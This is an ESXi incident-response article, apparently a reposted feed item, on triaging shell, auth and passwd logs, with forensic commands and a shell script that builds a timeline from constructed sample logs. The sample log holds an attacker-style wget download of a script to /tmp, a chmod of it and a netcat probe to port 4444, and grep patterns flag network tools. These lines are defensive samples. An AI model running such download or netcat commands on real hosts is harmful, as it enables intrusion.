Incident Response on ESXi: Rapid Triage and Analysis

A utility has been developed to perform rapid triage and analysis of ESXi logs using timeline CSVs from QELP. This tool provides critical insights for incident responders working with ESXi environments.

Key Features:

  • Combined timeline of Bash activity, logons, and user actions.
  • Logon event timeline categorized by type, including user/IP correlations.
  • Summary reports on Bash history, network tool usage, and newly created users.

🔗 Download `qelp-ir-triage-esxi` here: https://lnkd.in/e2yrkBaE

You Should Know:

1. Extracting ESXi Logs for Analysis

To gather logs from an ESXi host for forensic analysis, use:

vim-cmd hostsvc/hosthardware | grep -i "serialNumber"   # Get host info (identify the host in the case record)
esxcli system syslog config get                         # Check syslog config (local log dir, remote host, rotation)
esxcli system syslog mark --message="INCIDENT_START"    # Write a marker line into the logs to anchor the timeline

2. Parsing Bash History for Suspicious Activity

Check the ESXi shell audit log (`/var/log/shell.log`, the host's equivalent of a per-user `.bash_history`) for suspicious commands. Alternation in the pattern needs extended regex (`-E`); with plain `grep` the `|` is matched literally and nothing is found:

grep -iE "wget|curl|nc|nmap|ssh" /var/log/shell.log   # Download, scanning and remote-access tools run from the shell

3. Tracking User Logons and IPs

Extract authentication events to detect brute-force attempts or unauthorized access (again `-E` is required for the alternation):

grep -iE "failed|accepted" /var/log/auth.log   # Failed and successful logons with user, source IP and method

4. Analyzing Network Connections

List active connections and listening ports, with the owning process. The `esxcli` namespace is `network ip connection`:

esxcli network ip connection list                                   # All TCP/UDP connections with state and process
esxcli network ip connection list | grep -E "ESTABLISHED|LISTEN"    # Focus on live sessions and listeners

5. Detecting New User Creation

Check for unauthorized user additions and compare the result against a known-good baseline of accounts for the host:

grep -iE "home|bash" /etc/passwd   # Accounts with a home directory or interactive shell

6. Automating Log Collection with QELP

QELP helps convert ESXi logs into structured CSV timelines. Example command:

python3 qelp_parser.py -i /var/log -o timeline.csv 
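The checks in sections 2, 3, 5 and 6 all reduce to the same pattern: parse a log into structured rows, sort them into one timeline, and summarize. The script below is an added example, not code from the original post and not part of QELP or `qelp-ir-triage-esxi`. It builds a combined CSV timeline from constructed samples of `/var/log/shell.log` and `/var/log/auth.log`, counts failed logons per source IP, flags shell commands that invoke network tools, and lists shell-capable accounts that are missing from an assumed baseline. The log lines, PIDs, usernames and addresses (`192.0.2.x`, `198.51.100.x`, documentation ranges) are all constructed; point the functions at real log files to use it on a host.

```shell
#!/bin/sh
# Added example (not from the original post, not part of QELP): minimal ESXi
# log triage in POSIX sh. All sample data below is constructed.

WORK="${TMPDIR:-/tmp}/esxi-triage.$$"
mkdir -p "$WORK"
trap 'rm -rf "$WORK"' EXIT

# Constructed sample of /var/log/shell.log (ESXi shell command audit log).
cat > "$WORK/shell.log" <<'EOF'
2024-03-02T08:11:04Z shell[2100421]: [root]: esxcli system version get
2024-03-02T08:12:30Z shell[2100421]: [root]: wget http://198.51.100.7/update.sh -O /tmp/update.sh
2024-03-02T08:12:41Z shell[2100421]: [root]: chmod +x /tmp/update.sh
2024-03-02T08:13:02Z shell[2100421]: [root]: nc -z 198.51.100.7 4444
2024-03-02T08:15:10Z shell[2100533]: [backup-op]: vim-cmd vmsvc/getallvms
EOF

# Constructed sample of /var/log/auth.log (sshd records).
cat > "$WORK/auth.log" <<'EOF'
2024-03-02T08:09:51Z sshd[2100398]: Failed password for root from 192.0.2.55 port 50112 ssh2
2024-03-02T08:09:55Z sshd[2100398]: Failed password for root from 192.0.2.55 port 50114 ssh2
2024-03-02T08:10:02Z sshd[2100398]: Failed password for root from 192.0.2.55 port 50116 ssh2
2024-03-02T08:10:40Z sshd[2100410]: Accepted keyboard-interactive/pam for root from 192.0.2.55 port 50120 ssh2
2024-03-02T08:14:58Z sshd[2100520]: Accepted publickey for backup-op from 192.0.2.9 port 41022 ssh2
EOF

# Constructed sample of /etc/passwd; ESXi accounts normally use /bin/sh.
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:Administrator:/:/bin/sh
nfcuser:x:1000:1000:nfcuser:/:/bin/false
backup-op:x:1001:1001:backup-op:/home/backup-op:/bin/sh
svc-update:x:1002:1002:svc-update:/home/svc-update:/bin/sh
EOF

# shell.log -> CSV rows: timestamp,source,user,ip,detail (ip is empty here).
shell_rows() {
    sed -nE 's/^([^ ]+) shell\[[0-9]+\]: \[([^]]+)\]: (.*)$/\1,shell,\2,,"\3"/p' "$1"
}

# auth.log sshd results -> CSV rows: timestamp,source,user,ip,Accepted|Failed.
auth_rows() {
    sed -nE 's/^([^ ]+) sshd\[[0-9]+\]: (Accepted|Failed) [^ ]+ for ([^ ]+) from ([0-9.]+) port.*$/\1,sshd,\3,\4,\2/p' "$1"
}

# Combined timeline: header, then both sources merged and sorted. ISO-8601
# timestamps sort correctly as plain strings, so no date parsing is needed.
build_timeline() {
    printf 'timestamp,source,user,ip,detail\n'
    { shell_rows "$1"; auth_rows "$2"; } | sort
}

# Failed logons per source IP, highest first: a brute-force indicator that
# is worth reading next to any later "Accepted" from the same address.
failed_logons_by_ip() {
    auth_rows "$1" | awk -F, '$5 == "Failed" { c[$4]++ } END { for (ip in c) print c[ip], ip }' | sort -rn
}

# Shell commands whose first word is a download/scan/remote-access tool.
# The alternation needs grep -E; plain grep would treat "|" literally.
network_tool_hits() {
    shell_rows "$1" | grep -E ',"(wget|curl|nc|ncat|nmap|ssh|scp)( |")'
}

# Accounts with an interactive shell that are not on the baseline list
# (space-separated). Accounts with /bin/false are ignored.
unexpected_shell_accounts() {
    awk -F: -v base="$2" '
        BEGIN { n = split(base, b, " "); for (i = 1; i <= n; i++) ok[b[i]] = 1 }
        $7 ~ /\/(sh|bash|ash)$/ && !($1 in ok) { print $1 }' "$1"
}

# Run the triage over the constructed samples.
printf '== Combined timeline ==\n'
build_timeline "$WORK/shell.log" "$WORK/auth.log"
printf '\n== Failed logons by source IP ==\n'
failed_logons_by_ip "$WORK/auth.log"
printf '\n== Network tool use from the shell ==\n'
network_tool_hits "$WORK/shell.log"
printf '\n== Shell-capable accounts outside the baseline ==\n'
unexpected_shell_accounts "$WORK/passwd" "root backup-op"
```

On the sample data the timeline makes the sequence visible at a glance: three failed passwords from `192.0.2.55`, an accepted logon from the same address 38 seconds later, then `wget` and `nc` from the root shell. The baseline for `unexpected_shell_accounts` is an assumption you supply per host; keeping it in the case file rather than hard-coded lets the same script run across a cluster.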

What Undercode Says:

ESXi servers are high-value targets for ransomware and lateral movement. Rapid log analysis is critical for identifying:
– Lateral movement via SSH/RDP logons.
– Malicious payloads delivered via curl/wget.
– Backdoor users created post-exploitation.

Expected Commands for Incident Response:

esxcli software vib list | grep -i "unverified"         # Check installed modules (VIBs) and their acceptance level
esxcli network firewall ruleset list                    # Review firewall rulesets and which are enabled
vim-cmd vmsvc/getallvms                                 # List all VMs with their IDs (vmware-cmd is not present on ESXi)
for id in $(vim-cmd vmsvc/getallvms | awk 'NR>1 && $1 ~ /^[0-9]+$/ {print $1}'); do vim-cmd vmsvc/power.getstate "$id"; done   # Power state of each VM

Prediction:

As ESXi remains a prime target, automated IR tools like `qelp-ir-triage-esxi` will evolve to integrate YARA scanning and memory forensics for deeper threat detection.

Expected Output:

  • Structured CSV timelines of malicious activity.
  • Alert summaries on critical events (logons, Bash misuse).
  • Actionable IOCs (IPs, usernames, commands).

Reported By: Cudeso Incident – Hackers Feeds